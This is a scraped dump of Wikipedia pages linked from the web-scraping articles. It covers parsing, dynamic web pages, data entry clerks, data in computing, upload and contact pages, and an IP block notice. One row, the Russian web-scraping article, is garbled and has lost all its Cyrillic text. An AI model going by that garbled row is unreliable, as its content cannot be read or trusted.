verb, but in this sentence, it functions as part of an adjective phrase. 12 Since parsing is used to identify parts of speech, these sentences challenge the parsing ability of the reader. Another type of sentence that is difficult to parse is an attachment ambiguity, which includes a phrase that could potentially modify different parts of a sentence, and therefore presents a challenge in identifying syntactic relationship (i.e. "The boy saw the lady with the telescope", in which the ambiguous phrase with the telescope could modify the boy saw or the lady.) 11 A third type of sentence that challenges parsing ability is center embedding, in which phrases are placed in the center of other similarly formed phrases (i.e. "The rat the cat the man hit chased ran into the trap".) Sentences with 2 or in the most extreme cases 3 center embeddings are challenging for mental parsing, again because of ambiguity of syntactic relationship. 13 Within neurolinguistics there are multiple theories that aim to describe how parsing takes place in the brain. One such model is a more traditional generative model of sentence processing, which theorizes that within the brain there is a distinct module designed for sentence parsing, which is preceded by access to lexical recognition and retrieval, and then followed by syntactic processing that considers a single syntactic result of the parsing, only returning to revise that syntactic interpretation if a potential problem is detected. 14 The opposing, more contemporary model theorizes that within the mind, the processing of a sentence is not modular, or happening in strict sequence. Rather, it poses that several different syntactic possibilities can be considered at the same time, because lexical access, syntactic processing, and determination of meaning occur in parallel in the brain. In this way these processes are integrated. 15 Although there is still much to learn about the neurology of parsing, studies have shown evidence that several areas of the brain might play a role in parsing. These include the left anterior temporal pole, the left inferior frontal gyrus, the left superior temporal gyrus, the left superior frontal gyrus, the right posterior cingulate cortex, and the left angular gyrus. Although it has not been absolutely proven, it has been suggested that these different structures might favor either phrase-structure parsing or dependency-structure parsing, meaning different types of parsing could be processed in different ways which have yet to be understood. 16 Discourse analysis examines ways to analyze language use and semiotic events. Persuasive language may be called rhetoric. A parser is a software component that takes input data (typically text) and builds a data structure often some kind of parse tree, abstract syntax tree or other hierarchical structure, giving a structural representation of the input while checking for correct syntax. The parsing may be preceded or followed by other steps, or these may be combined into a single step. The parser is often preceded by a separate lexical analyser, which creates tokens from the sequence of input characters; alternatively, these can be combined in scannerless parsing. Parsers may be programmed by hand or may be automatically or semi-automatically generated by a parser generator. Parsing is complementary to templating, which produces formatted output. These may be applied to different domains, but often appear together, such as the scanf printf pair, or the input (front end parsing) and output (back end code generation) stages of a compiler. The input to a parser is typically text in some computer language, but may also be text in a natural language or less structured textual data, in which case generally only certain parts of the text are extracted, rather than a parse tree being constructed. Parsers range from very simple functions such as scanf, to complex programs such as the frontend of a C compiler or the HTML parser of a web browser. An important class of simple parsing is done using regular expressions, in which a group of regular expressions defines a regular language and a regular expression engine automatically generating a parser for that language, allowing pattern matching and extraction of text. In other contexts regular expressions are instead used prior to parsing, as the lexing step whose output is then used by the parser. The use of parsers varies by input. In the case of data languages, a parser is often found as the file reading facility of a program, such as reading in HTML or XML text; these examples are markup languages. In the case of programming languages, a parser is a component of a compiler or interpreter, which parses the source code of a computer programming language to create some form of internal representation; the parser is a key step in the compiler frontend. Programming languages tend to be specified in terms of a deterministic context-free grammar because fast and efficient parsers can be written for them. For compilers, the parsing itself can be done in one pass or multiple passes see one-pass compiler and multi-pass compiler. The implied disadvantages of a one-pass compiler can largely be overcome by adding fix-ups, where provision is made for code relocation during the forward pass, and the fix-ups are applied backwards when the current program segment has been recognized as having been completed. An example where such a fix-up mechanism would be useful would be a forward GOTO statement, where the target of the GOTO is unknown until the program segment is completed. In this case, the application of the fix-up would be delayed until the target of the GOTO was recognized. Conversely, a backward GOTO does not require a fix-up, as the location will already be known. Context-free grammars are limited in the extent to which they can express all of the requirements of a language. Informally, the reason is that the memory of such a language is limited. The grammar cannot remember the presence of a construct over an arbitrarily long input; this is necessary for a language in which, for example, a name must be declared before it may be referenced. More powerful grammars that can express this constraint, however, cannot be parsed efficiently. Thus, it is a common strategy to create a relaxed parser for a context-free grammar which accepts a superset of the desired language constructs (that is, it accepts some invalid constructs); later, the unwanted constructs can be filtered out at the semantic analysis (contextual analysis) step. For example, in Python the following is syntactically valid code: The following code, however, is syntactically valid in terms of the context-free grammar, yielding a syntax tree with the same structure as the previous, but violates the semantic rule requiring variables to be initialized before use: The following example demonstrates the common case of parsing a computer language with two levels of grammar: lexical and syntactic. The first stage is the token generation, or lexical analysis, by which the input character stream is split into meaningful symbols defined by a grammar of regular expressions. For example, a calculator program would look at an input such as "12 (3 4) 2" and split it into the tokens 12, , (, 3, , 4, ), , 2, each of which is a meaningful symbol in the context of an arithmetic expression. The lexer would contain rules to tell it that the characters , , , ( and ) mark the start of a new token, so meaningless tokens like "12 or (3" will not be generated. The next stage is parsing or syntactic analysis, which is checking that the tokens form an allowable expression. This is usually done with reference to a context-free grammar which recursively defines components that can make up an expression and the order in which they must appear. However, not all rules defining programming languages can be expressed by context-free grammars alone, for example type validity and proper declaration of identifiers. These rules can be formally expressed with attribute grammars. The final phase is semantic parsing or analysis, which is working out the implications of the expression just validated and taking the appropriate action. 17 In the case of a calculator or interpreter, the action is to evaluate the expression or program; a compiler, on the other hand, would generate some kind of code. Attribute grammars can also be used to define these actions. The task of the parser is essentially to determine if and how the input can be derived from the start symbol of the grammar. This can be done in essentially two ways: LL parsers and recursive-descent parser are examples of top-down parsers that cannot accommodate left recursive production rules. Although it has been believed that simple implementations of top-down parsing cannot accommodate direct and indirect left-recursion and may require exponential time and space complexity while parsing ambiguous context-free grammars, more sophisticated algorithms for top-down parsing have been created by Frost, Hafiz, and Callaghan 20 21 which accommodate ambiguity and left recursion in polynomial time and which generate polynomial-size representations of the potentially exponential number of parse trees. Their algorithm is able to produce both left-most and right-most derivations of an input with regard to a given context-free grammar. An important distinction with regard to parsers is whether a parser generates a leftmost derivation or a rightmost derivation (see context-free grammar). LL parsers will generate a leftmost derivation and LR parsers will generate a rightmost derivation (although usually in reverse). 18 Some graphical parsing algorithms have been designed for visual programming languages. 22 23 Parsers for visual languages are sometimes based on graph grammars. 24 Adaptive parsing algorithms have been used to construct "self-extending" natural language user interfaces. 25 A simple parser implementation reads the entire input file, performs an intermediate computation or translation, and then writes the entire output file, such as in-memory multi-pass compilers. Alternative parser implementation approaches: Some of the well known parser development tools include the following: Lookahead establishes the maximum incoming tokens that a parser can use to decide which rule it should use. Lookahead is especially relevant to LL, LR, and LALR parsers, where it is often explicitly indicated by affixing the lookahead to the algorithm name in parentheses, such as LALR(1). Most programming languages, the primary target of parsers, are carefully defined in such a way that a parser with limited lookahead, typically one, can parse them, because parsers with limited lookahead are often more efficient. One important change citation needed to this trend came in 1990 when Terence Parr created ANTLR for his Ph.D. thesis, a parser generator for efficient LL(k) parsers, where k is any fixed value. LR parsers typically have only a few actions after seeing each token. They are shift (add this token to the stack for later reduction), reduce (pop tokens from the stack and form a syntactic construct), end, error (no known rule applies) or conflict (does not know whether to shift or reduce). Lookahead has two advantages. clarification needed Example: Parsing the Expression 1 2 3 dubious discuss Most programming languages (except for a few such as APL and Smalltalk) and algebraic formulas give higher precedence to multiplication than addition, in which case the correct interpretation of the example above is 1 (2 3). Note that Rule4 above is a semantic rule. It is possible to rewrite the grammar to incorporate this into the syntax. However, not all such rules can be translated into syntax. Initially Input 1, , 2, , 3 The parse tree and resulting code from it is not correct according to language semantics. To correctly parse without lookahead, there are three solutions: The parse tree generated is correct and simply more efficient clarify citation needed than non-lookahead parsers. This is the strategy followed in LALR parsers. |
86 | https://en.wikipedia.org/wiki/Web_scraping | https://ru.wikipedia.org/wiki/%D0%92%D0%B5%D0%B1-%D1%81%D0%BA%D1%80%D0%B5%D0%B9%D0%BF%D0%B8%D0%BD%D0%B3 | ( , . web scraping) — 1 . , , , GET 2 . 3 . (HTML XHTML) . , , , . — , 4 . , . — , , . , , , . , , , API 13 . , , . , . , , . html- xml , 13 . , . UNIX grep ( 14 ) ( , Perl Python). HTML , — . . , , , . , URL 15 . , , XQuery HTQL, HTML . Document Object Model (DOM) DOM — API HTML- XML 16 . , Internet Explorer Mozilla, , . DOM 17 . , , . . , . 18 . ( ) ( ). , , . , 19 . , , , , 20 . , , , API 21 . . (MIS) , 22 . , 23 . , , , , 24 . , . , , . , . , , , URL . : , , , , , , , . , , . : , , online , , DaaS, . Scrapy ( 26 ). Import.IO 27 . , , Nokogiri, Ruby 21 , , : Outwit Hub 28 . . , JSON . API . , Amazon AWS Google Google (API Discovery service), , . , ( ) . , DOM, , . , . : : , , . IP , (User Agent) , — , 29 . . 27 2006 152 30 . (GDPR) 31 . 2020 , (CNIL) 32 . |
87 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Dynamic_web_page | A dynamic web page is a web page constructed at runtime (during software execution), as opposed to a static web page, delivered as it is stored. A server-side dynamic web page is a web page whose construction is controlled by an application server processing server-side scripts. 1 In server-side scripting, parameters determine how the assembly of every new web page proceeds, and including the setting up of more client-side processing. A client-side dynamic web page processes the web page using JavaScript running in the browser as it loads. JavaScript can interact with the page via Document Object Model (DOM), to query page state and modify it. Even though a web page can be dynamic on the client-side, it can still be hosted on a static hosting service such as GitHub Pages or Amazon S3 as long as there is not any server-side code included. A dynamic web page is then reloaded by the user or by a computer program to change some variable content. The updating information could come from the server, or from changes made to that page's DOM. This may or may not truncate the browsing history or create a saved version to go back to, but a dynamic web page update using AJAX technologies will neither create a page to go back to, nor truncate the web browsing history forward of the displayed page. Using AJAX, the end user gets one dynamic page managed as a single page in the web browser while the actual web content rendered on that page can vary. The AJAX engine sits only on the browser requesting parts of its DOM, the DOM, for its client, from an application server. A particular application server could offer a standardized REST style interface to offer services to the web application. 2 DHTML is the umbrella term for technologies and methods used to create web pages that are not static web pages, though it has fallen out of common use since the popularization of AJAX, a term which is now itself rarely used. Client-side-scripting, server-side scripting, or a combination of these make for the dynamic web experience in a browser. Classical hypertext navigation, with HTML or XHTML alone, provides "static" content, meaning that the user requests a web page and simply views the page and the information on that page. However, a web page can also provide a "live", "dynamic", or "interactive" user experience. Content (text, images, form fields, etc.) on a web page can change, in response to different contexts or conditions. There are two ways to create this kind of effect: Web pages that use client-side scripting must use presentation technology broadly called rich interfaced pages. Client-side scripting languages like JavaScript or ActionScript, used for Dynamic HTML (DHTML) and Flash technologies respectively, are frequently used to orchestrate media types (sound, animations, changing text, etc.) of the presentation. The scripting also allows use of remote scripting, a technique by which the DHTML page requests additional information from a server, using a hidden Frame, XMLHttpRequests, or a web service. Web pages that use server-side scripting are often created with the help of server-side languages such as PHP, Perl, ASP, JSP, ColdFusion and other languages. These server-side languages typically use the Common Gateway Interface (CGI) to produce dynamic web pages. These kinds of pages can also use, on the client-side, the first kind (DHTML, etc.). It is difficult to be precise about "dynamic web page beginnings" or chronology because the precise concept makes sense only after the "widespread development of web pages". HTTP has existed since 1989, HTML, publicly standardized since 1996. The web browser's rise in popularity started with Mosaic in 1993. Between 1995 and 1996, multiple dynamic web products were introduced to the market, including Coldfusion, WebObjects, PHP, and Active Server Pages. The introduction of JavaScript (then known as LiveScript) enabled the production of client-side dynamic web pages, with JavaScript code executed in the client's browser. 4 The letter "J" in the term AJAX originally indicated the use of JavaScript, as well as XML. With the rise of server side JavaScript processing, for example, Node.js, originally developed in 2009, JavaScript is also used to dynamically create pages on the server that are sent fully formed to clients. MediaWiki, the content management system that powers Wikipedia, is an example for an originally server-side dynamic web page, interacted with through form submissions and URL parameters. Throughout time, progressively enhancing extensions such as the visual editor have also added elements that are dynamic on the client side, while the original dynamic server-side elements such as the classic edit form remain available to be fallen back on (graceful degradation) in case of error or incompatibility. A program running on a web server (server-side scripting) is used to generate the web content on various web pages, manage user sessions, and control workflow. Server responses may be determined by such conditions as data in a posted HTML form, parameters in the URL, the type of browser being used, the passage of time, or a database or server state. Such web pages are often created with the help of server-side languages such as ASP, ColdFusion, Go, JavaScript, Perl, PHP, Ruby, Python, WebDNA and other languages, by a support server that can run on the same hardware as the web server. These server-side languages often use the Common Gateway Interface (CGI) to produce dynamic web pages. Two notable exceptions are ASP.NET, and JSP, which reuse CGI concepts in their APIs but actually dispatch all web requests into a shared virtual machine. The server-side languages are used to embed tags or markers within the source file of the web page on the web server. 5 When a user on a client computer requests that web page, the web server interprets these tags or markers to perform actions on the server. For example, the server may be instructed to insert information from a database or information such as the current date. Dynamic web pages are often cached when there are few or no changes expected and the page is anticipated to receive considerable amount of web traffic that would wastefully strain the server and slow down page loading if it had to generate the pages on the fly for each request. Client-side scripting is changing interface behaviors within a specific web page in response to input device actions, or at specified timing events. In this case, the dynamic behavior occurs within the presentation. The client-side content is generated on the user's local computer system. 6 Such web pages use presentation technology called rich interfaced pages. Client-side scripting languages like JavaScript or ActionScript, used for Dynamic HTML (DHTML) and Flash technologies respectively, are frequently used to orchestrate media types (sound, animations, changing text, etc.) of the presentation. Client-side scripting also allows the use of remote scripting, a technique by which the DHTML page requests additional information from a server, using a hidden frame, XMLHttpRequests, or a Web service. The first public use of JavaScript was in 1995, when the language was implemented in Netscape Navigator 2, standardized as ECMAScript two years later. 7 The client-side content is generated on the client's computer. The web browser retrieves a page from the server, then processes the code embedded in the page (typically written in JavaScript) and displays the retrieved page's content to the user. 8 The innerHTML property (or write command) can illustrate the client-side dynamic page generation: two distinct pages, A and B, can be regenerated (by an "event response dynamic") as document.innerHTML A and document.innerHTML B; or "on load dynamic" by document.write(A) and document.write(B). All of the client and server components that collectively build a dynamic web page are called a web application. Web applications manage user interactions, state, security, and performance. 9 Ajax uses a combination of both client-side scripting and server-side requests. It is a web application development technique for dynamically interchanging content, and it sends requests to the server for data in order to do so. The server returns the requested data which is then processed by a client-side script. This technique can reduce server load time because the client does not request the entire webpage to be regenerated by the server's language parser; only the content that will change is transmitted. Google Maps is an example of a web application that uses Ajax techniques. A web client, such as a web browser, can act as its own server, accessing data from many different servers, such as Gopher, FTP, NNTP (Usenet) and HTTP, to build a page. HTTP supports uploading documents from the client back to the server. There are several HTTP methods for doing this. |
88 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:File_Upload_Wizard | Thank you for offering to contribute an image or other media file for use on Wikipedia. This wizard will guide you through a questionnaire prompting you for the appropriate copyright and sourcing information for each file. Please ensure you understand copyright and the image use policy before proceeding. Uploads to Wikimedia Commons Upload a non-free file Uploads locally to the English Wikipedia; must comply with the non-free content criteria You do not have JavaScript enabled Sorry, in order to use this uploading script, JavaScript must be enabled. You can still use the plain Special:Upload page to upload files to the English Wikipedia without JavaScript. You are not currently logged in. Sorry, in order to use this uploading script and to upload files, you need to be logged in with your named account. Please log in and then try again. Your account has not become confirmed yet. Sorry, in order to upload files on the English Wikipedia, you need to have a confirmed account. Normally, your account will become confirmed automatically once you have made 10 edits and four days have passed since you created it. You may already be able to upload files on the Wikimedia Commons, but you can't do it on the English Wikipedia just yet. If the file you want to upload has a free license, please go to Commons and upload it there. Important note: if you don't want to wait until you are autoconfirmed, you may ask somebody else to upload a file for you at Wikipedia:Files for upload. In very rare cases an administrator may make your account confirmed manually through a request at Wikipedia:Requests for permissions Confirmed. Sorry, a few special characters and character combinations cannot be used in the filename for technical reasons. This goes especially for : and . Your filename has been modified to avoid these. Please check if it is okay now. The filename you chose seems to be very short, or overly generic. Please don't use: A file of this name already exists on Commons If you upload your file with this name, you will be masking the existing file and make it inaccessible. Your new file will be displayed everywhere the existing file was previously used. This should not be done, except in very rare exceptional cases. Please don't upload your file under this name, unless you seriously know what you are doing. Choose a different name for your new file instead. A file of this name already exists. If you upload your file with this name, you will be overwriting the existing file. Your new file will be displayed everywhere the existing file was previously used. Please don't do this, unless you have a good reason to: It is very important that you read through the following options and questions, and provide all required information truthfully and carefully. Thank you for offering to upload a free work. Wikipedia loves free files. However, we would love it even more if you uploaded them on our sister project, the Wikimedia Commons. Files uploaded on Commons can be used immediately here on Wikipedia as well as on all its sister projects. Uploading files on Commons works just the same as here. Your Wikipedia account will automatically work on Commons too. Please consider uploading your file on Commons. However, if you prefer to do it here instead, you may go ahead with this form. You can also first use this form to collect the information about your file and then send it to Commons from here. Please note that by "entirely self-made" we really mean just that. Do not use this section for any of the following: Editors who falsely declare such items as their "own work" will be blocked from editing. Use this only if there is an explicit licensing statement in the source. The website must explicitly say that the image is released under a license that allows free re-use for any purpose, e.g. the Creative Commons Attribution license. You must be able to point exactly to where it says this. If the source website doesn't say so explicitly, please do not upload the file. Public Domain means that nobody owns any copyrights on this work. It does not mean simply that it is freely viewable somewhere on the web or that it has been widely used by others. This is not for images you simply found somewhere on the web. Most images on the web are under copyright and belong to somebody, even if you believe the owner won't care about that copyright. If it is in the public domain, you must be able to point to an actual law that makes it so. If you can't point to such a law but merely found this image somewhere, then please do not upload it. Please remember that you will need to demonstrate that: This file will be used in the following article: Enter the name of exactly one Wikipedia article, without the ... brackets and without the "http: en.wikipedia.org ... URL code. It has to be an actual article, not a talkpage, template, user page, etc. If you plan to use the file in more than one article, please name only one of them here. Then, after uploading, open the image description page for editing and add your separate explanations for each additional article manually. Example article okay. This article doesn't exist The article Example could not be found. Please check the spelling, and make sure you enter the name of an existing article in which you will include this file. If this is an article you are only planning to write, please write it first and upload the file afterwards. This is not an actual encyclopedia article The page Example is not in the main article namespace. Non-free files can only be used in mainspace article pages, not on a user page, talk page, template, etc. Please upload this file only if it is going to be used in an actual article. If this page is an article draft in your user space, we're sorry, but we must ask you to wait until the page is ready and has been moved into mainspace, and only upload the file after that. This is a disambiguation page The page Example is not a real article, but a disambiguation page pointing to a number of other pages. Please check and enter the exact title of the actual target article you meant. If neither of these two statements applies, then please do not upload this image. This section is not for images used merely to illustrate an article about a person or thing, showing what that person or thing look like. In view of this, please explain how the use of this file will be minimal. Well, we're very sorry, but if you're not sure about this file's copyright status, or if it doesn't fit into any of the groups above, then: Please don't upload it. Really, please don't. Even if you think it would make for a great addition to an article. We really take these copyright rules very seriously on Wikipedia. Note that media is assumed to be fully-copyrighted unless shown otherwise; the burden is on the uploader. In particular, please don't upload: If you are in any doubt, please ask some experienced editors for advice before uploading. People will be happy to assist you at Wikipedia:Media copyright questions. Thank you. This is the data that will be submitted to upload: Your file is being uploaded. This might take a minute or two, depending on the size of the file and the speed of your internet connection. Once uploading is completed, you will find your new file at this link: File:Example.jpg Your file has been uploaded successfully and can now be found here: File:Example.jpg Please follow the link and check that the image description page has all the information you meant to include. If you want to change the description, just go to the image page, click the "edit" tab at the top of the page and edit just as you would edit any other page. Do not go through this upload form again, unless you want to replace the actual file with a new version. To insert this file into an article, you may want to use code similar to the following: If you wish to make a link to the file in text, without actually showing the image, for instance when discussing the image on a talk page, you can use the following (mark the : after the initial brackets ): See Wikipedia:Picture tutorial for more detailed help on how to insert and position images in pages. Thank you for using the File Upload Wizard.Please leave your feedback, comments, bug reports or suggestions on the talk page. |
89 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_entry_clerk | A data entry clerk, also known as data preparation and control operator, data registration and control operator, and data preparation and registration operator, is a member of staff employed to enter or update data into a computer system. 1 2 Data is often entered into a computer from paper documents 3 using a keyboard. 4 The keyboards used can often have special keys and multiple colors to help in the task and speed up the work. 5 Proper ergonomics at the workstation is a common topic considered. 6 7 8 The data entry clerk may also use a mouse, 9 10 and a manually-fed scanner may be involved. 11 Speed and accuracy, not necessarily in that order, are the key measures of the job. 12 The invention of punched card data processing in the 1890s created a demand for many workers, typically women, to run keypunch machines. To ensure accuracy, data was often entered twice; the second time a different keyboarding device, known as a verifier (such as the IBM 056) was used. In the 1970s, punched card data entry was gradually replaced by the use of video display terminals. For a mailing company, data entry clerks might be required to type in reference numbers for items of mail which had failed to reach their destination, so that the relevant addresses could be deleted from the database used to send the mail out. If the company was compiling a database from addresses handwritten on a questionnaire, the person typing those into the database would be a data entry clerk. In a cash office, a data entry clerk might be required to type expenses into a database using numerical codes. With to the advance of technology, many data entry clerks no longer work with hand-written documents. Instead, the documents are first scanned by a combined OCR OMR system (optical character recognition and optical mark recognition,) which attempts to read the documents and process the data electronically. The accuracy of OCR varies widely based upon the quality of the original document as well as the scanned image; hence the ongoing need for data entry clerks. Although OCR technology is continually being developed, many tasks still require a data entry clerk to review the results afterward to check the accuracy of the data and to manually key in any missed or incorrect information. 13 An example of this system would be one commonly used to document health insurance claims, such as for Medicaid in the United States. In many systems, the hand-written forms are first scanned into digital images (JPEG, PNG, bitmap, etc.). These files are then processed by the optical character recognition system, where many fields are completed by the computerized optical scanner. When the OCR software has low confidence in a data field, it is flagged for review not the entire record but just the single field. The data entry clerk then manually reviews the data already entered by OCR, corrects it if needed, and fills in any missing data 13 by simultaneously viewing the image on-screen. The accuracy of personal records, as well as billing or financial information, is usually very important to the general public as well as the healthcare provider. Sensitive or vital information such as this is often checked many times, by both clerk and machine, before being accepted. Accuracy is usually more important than speed, because detection and correction of errors can be very time-consuming. 12 Staying focused and speed are also required. 14 13 The job is usually low-skilled, so veteran staff are often employed on a temporary basis after a large survey or census has been completed. However, most companies handling large amounts of data on a regular basis will spread the contracts and workload across the year and will hire part-time. The role of data entry clerks working with physical hand-written documents is on the decline in the developed world, because employees within a company frequently enter their own data, as it is collected now, instead of having a different employee do this task. An example of this is an operator working in a call center or a cashier in a shop. Cost is another reason for the decline. Data entry is labor-intensive for large batches and therefore expensive, so large companies will sometimes outsource the work, either locally or to third-world countries where there is no shortage of cheaper unskilled labor. 15 16 17 As of 2016 update , the median pay was between $19,396 and $34,990 in the United States. 18 As of 2018 update , The New York Times was still carrying ads for the job title Data Entry Clerk. 19 20 For the job as a data entry clerk, competent math and English skills may be necessary. 21 The worker will need to be very familiar with office software such as word processors, databases, and spreadsheets. 21 18 One must have quickness, focus, and customer service skills. 21 Education higher than a high school diploma is often not required, but some companies require a bachelor's degree. 18 Companies also hope the worker will have one year of experience in a related field. 18 |
90 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_(computer_science) | In computer science, data (treated as singular, plural, or as a mass noun) is any sequence of one or more symbols; datum is a single symbol of data. Data requires interpretation to become information. Digital data is data that is represented using the binary number system of ones (1) and zeros (0), instead of analog representation. In modern (post 1960) computer systems, all data is digital. Data exists in three states: data at rest, data in transit and data in use. Data within a computer, in most cases, moves as parallel data. Data moving to or from a computer, in most cases, moves as serial data. Data sourced from an analog device, such as a temperature sensor, may be converted to digital using an analog-to-digital converter. Data representing quantities, characters, or symbols on which operations are performed by a computer are stored and recorded on magnetic, optical, electronic, or mechanical recording media, and transmitted in the form of digital electrical or optical signals. 1 Data pass in and out of computers via peripheral devices. Physical computer memory elements consist of an address and a byte word of data storage. Digital data are often stored in relational databases, like tables or SQL databases, and can generally be represented as abstract key value pairs. Data can be organized in many different types of data structures, including arrays, graphs, and objects. Data structures can store data of many different types, including numbers, strings and even other data structures. Metadata helps translate data to information. Metadata is data about the data. Metadata may be implied, specified or given. Data relating to physical events or processes will have a temporal component. This temporal component may be implied. This is the case when a device such as a temperature logger receives data from a temperature sensor. When the temperature is received it is assumed that the data has a temporal reference of now. So the device records the date, time and temperature together. When the data logger communicates temperatures, it must also report the date and time as metadata for each temperature reading. Fundamentally, computers follow a sequence of instructions they are given in the form of data. A set of instructions to perform a given task (or tasks) is called a program. A program is data in the form of coded instructions to control the operation of a computer or other machine. 2 In the nominal case, the program, as executed by the computer, will consist of machine code. The elements of storage manipulated by the program, but not actually executed by the central processing unit (CPU), are also data. At its most essential, a single datum is a value stored at a specific location. Therefore, it is possible for computer programs to operate on other computer programs, by manipulating their programmatic data. To store data bytes in a file, they have to be serialized in a file format. Typically, programs are stored in special file types, different from those used for other data. Executable files contain programs; all other files are also data files. However, executable files may also contain data used by the program which is built into the program. In particular, some executable files have a data segment, which nominally contains constants and initial values for variables, both of which can be considered data. The line between program and data can become blurry. An interpreter, for example, is a program. The input data to an interpreter is itself a program, just not one expressed in native machine language. In many cases, the interpreted program will be a human-readable text file, which is manipulated with a text editor program. Metaprogramming similarly involves programs manipulating other programs as data. Programs like compilers, linkers, debuggers, program updaters, virus scanners and such use other programs as their data. For example, a user might first instruct the operating system to load a word processor program from one file, and then use the running program to open and edit a document stored in another file. In this example, the document would be considered data. If the word processor also features a spell checker, then the dictionary (word list) for the spell checker would also be considered data. The algorithms used by the spell checker to suggest corrections would be either machine code data or text in some interpretable programming language. In an alternate usage, binary files (which are not human-readable) are sometimes called data as distinguished from human-readable text. 3 The total amount of digital data in 2007 was estimated to be 281 billion gigabytes (281 exabytes). 4 5 Keys in data provide the context for values. Regardless of the structure of data, there is always a key component present. Keys in data and data-structures are essential for giving meaning to data values. Without a key that is directly or indirectly associated with a value, or collection of values in a structure, the values become meaningless and cease to be data. That is to say, there has to be a key component linked to a value component in order for it to be considered data. citation needed Data can be represented in computers in multiple ways, as per the following examples: It is only after instantiation that an object of a specified class exists. After an object's reference is cleared, the object also ceases to exist. The memory locations where the object's data was stored are garbage and are reclassified as unused memory available for reuse. |
91 | https://en.wikipedia.org/wiki/Data_scraping | https://fr.wikipedia.org/wiki/Capture_de_donn%C3%A9es_d%27%C3%A9cran | Cet article est une bauche concernant l’informatique. Vous pouvez partager vos connaissances en l’am liorant (comment ?) selon les recommandations des projets correspondants. La capture de donn es d’ cran 1 (screen scraping en anglais) est une technique par laquelle un programme r cup re des donn es normalement destin es tre affich es par un dispositif de sortie vid o (g n ralement un moniteur) afin d’en extraire des informations. Il s’agit souvent de pages web dans lesquelles on souhaite r cup rer des informations, mais il peut galement s’agir de toute autre forme d’informations qui est format e avant tout en vue d’ tre affich e sur un cran. Il peut galement s’agir d’informations destin es un terminal texte, ou encore d’un cran de t l phone cellulaire sur lequel les informations peuvent tre analys es apr s y avoir t affich es par une autre application. |
92 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Contact_us | Introduction Readers How to report a problem with an article, or find out more information. Article subjects Problems with articles about you, your company, or somebody you represent. Licensing How to copy Wikipedia's information, donate your own, or report unlicensed use of your information. Donors Find out about the process, how to donate, and information about how your money is spent. Press and partnerships If you're a member of the press looking to contact Wikipedia, or have a business proposal for us. Back to main page Thank you for your interest in contacting Wikipedia. Before proceeding, some important disclaimers: The links on the left should direct you to how to contact us or resolve problems. If you cannot find your issue listed there, you can email helpful, experienced volunteers at info-enwikimedia.org. Please refrain from emailing about disagreements with content; they will not be resolved via email. |
93 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:EditPage/Data_scraping | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Pages transcluded onto the current version of this page (help): Return to Data scraping. |
94 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Maintenance_template_removal | Many Wikipedia pages display maintenance templates that identify problems. You may have arrived at this help page after clicking a link on a maintenance template saying "Learn how and when to remove this template message". Maintenance templates are added and removed by volunteers. This help page explains the process for examining and removing such templates. Maintenance templates (or "tags") are not removed automatically. Even if you fix the issue(s) described in a maintenance template, the tag will remain in the article until you or someone else manually removes it. The mechanics of removal are usually as simple as clicking "Edit" at the top of the page or in the section involved (if you're not already in edit mode), removing the code that produces the display of the template, leaving an edit summary, and saving the page. It is not okay to remove maintenance templates until the issue flagged by the template is remedied first—that is, until the maintenance tag is no longer valid—unless it truly did not belong in the first place. Wikipedia works because of the efforts of volunteers just like you, making bold edits to help build this encyclopedia. Fixing problems and then removing maintenance templates when you are done is important in that effort. We don't know which maintenance tag brought you to this page, and thus what specific problem needs attention. However, every maintenance template contains links to help pages, policies, guidelines, or other relevant pages that provide information on the problem the template was placed to flag. You will also find guidance on some of the more common templates below. Many common templates address problems with article citations and references, or their lack because reliable sourcing is the lifeblood of Wikipedia articles and at the core of all of Wikipedia's content policies and guidelines, such as notability, verifiability, neutral point of view, and no original research. But a host of other issues may be flagged, including tone and style of writing, structure, and formatting, lack of links to or from other articles, compliance with Wikipedia's manual of style and the lack of a lead section. Please make sure the issue has been resolved before removing the template. That does require some effort on your part—to understand both the problem and how to solve it. If the issue flagged by the maintenance template is that the article contains no references, a citation needed template used might be Unreferenced typically placed by the code you would see when wikitext (source) editing: Unreferenced date August 2024 . It is important to understand that what you see when reading an article, and what you see when editing it, are different unless you're in Visual editing mode. Thus, the above code, only seen when doing source editing, results in the display of the 'called' template below: This template contains several links, indicated by the words and phrases in blue. Three of these links are to pages that, when explored, provide context and resources for you to understand why the template was placed on the page, and how to address the issue of the article being unreferenced: Whatever maintenance tag brought you to this help page should likewise contain relevant explanatory links addressed to whatever its issue is. Read these explanatory and 